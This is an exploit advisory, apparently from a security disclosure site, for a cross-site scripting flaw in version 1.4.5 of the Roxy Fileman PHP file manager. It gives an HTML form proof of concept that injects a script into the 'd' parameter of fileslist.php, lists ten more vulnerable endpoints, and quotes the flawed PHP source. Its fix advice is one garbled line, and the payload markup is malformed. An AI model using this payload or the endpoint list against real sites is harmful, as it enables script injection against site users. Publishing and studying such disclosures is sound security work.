Roxy Fileman Cross Site Scripting

2017.01.13
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

*=============================================================| | Exploit Title: Roxy Fileman Cross Site Scripting | | Exploit Author: Ashiyane Digital Security Team | | Vendor Homepage: http://www.roxyfileman.com/ | | Download Link : http://www.roxyfileman.com/download.php?f=1.4.5-php | | Version : V 1.4.5 | | Platform : PHP | | Tested on: Kali Linux | | Date: 1 /12 / 2017 *=============================================================| | Exploit Code: | |<HTML> |<HEAD> | <TITLE>Roxy Fileman Cross Site Scripting</TITLE> |</HEAD> |<BODY> |<form action="http://Target/[PATH]/fileman/php/fileslist.php" method="post"> | <input type="hidden" id="d" value="=%252F2%252Ffileman%252FUploads'%22()%26%25"><script>alert('M.R.S.L.Y')</script>/> |</form> |</BODY> |</HTML> | *=======================| | vulnerability Method : GET & POST | Files that have this vulnerability : | | http://Target/[PATH]/fileman/php/copydir.php | http://Target/[PATH]/fileman/php/copyfile.php | http://Target/[PATH]/fileman/php/createdir.php | http://Target/[PATH]/fileman/php/deletedir.php | http://Target/[PATH]/fileman/php/renamedir.php | http://Target/[PATH]/fileman/php/thumb.php | http://Target/[PATH]/fileman/php/movefile.php | http://Target/[PATH]/fileman/php/downloaddir.php | http://Target/[PATH]/fileman/php/dirtree.php | http://Target/[PATH]/fileman/php/movedir.php *=======================| |How to fix this vulnerability : | |You should first try to f.ilter all input variables ، After use command echo in script :) | *=======================| |Vulnerable code For Example: | |include '../system.inc.php'; |include 'functions.inc.php'; | |verifyAction('FILESLIST'); |checkAccess('FILESLIST'); | |$path = (empty($_POST['d'])? getFilesPath(): $_POST['d']); |$type = (empty($_POST['type'])?'':strtolower($_POST['type'])); |if($type != 'image' && $type != 'flash') | $type = ''; |verifyPath($path); | |$files = listDirectory(fixPath($path), 0); |natcasesort($files); |$str = ''; |echo '['; |foreach ($files as $f){ | $fullPath = $path.'/'.$f; | if(!is_file(fixPath($fullPath)) || ($type == 'image' && !RoxyFile::IsImage($f)) || ($type == 'flash' && !RoxyFile::IsFlash($f))) | continue; | $size = filesize(fixPath($fullPath)); | $time = filemtime(fixPath($fullPath)); | $w = 0; | $h = 0; | if(RoxyFile::IsImage($f)){ | $tmp = @getimagesize(fixPath($fullPath)); | if($tmp){ | $w = $tmp[0]; | $h = $tmp[1]; | } | } | $str .= '{"p":"'.mb_ereg_replace('"', '\"', $fullPath).'","s":"'.$size.'","t":"'.$time.'","w":"'.$w.'","h":"'.$h.'"},'; |} |$str = mb_substr($str, 0, -1); |echo $str; |echo ']'; |?> *=============================================================| | Special Thanks To : Ehsan Cod3r ، micle ، Und3rgr0und ، Amir.ght ، | xenotix، modiret، V For Vendetta ، Alireza ، r4ouf ، Spoofer ، | And All Of My Friends ، The Last One : My Self, M.R.S.L.Y *=============================================================|


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top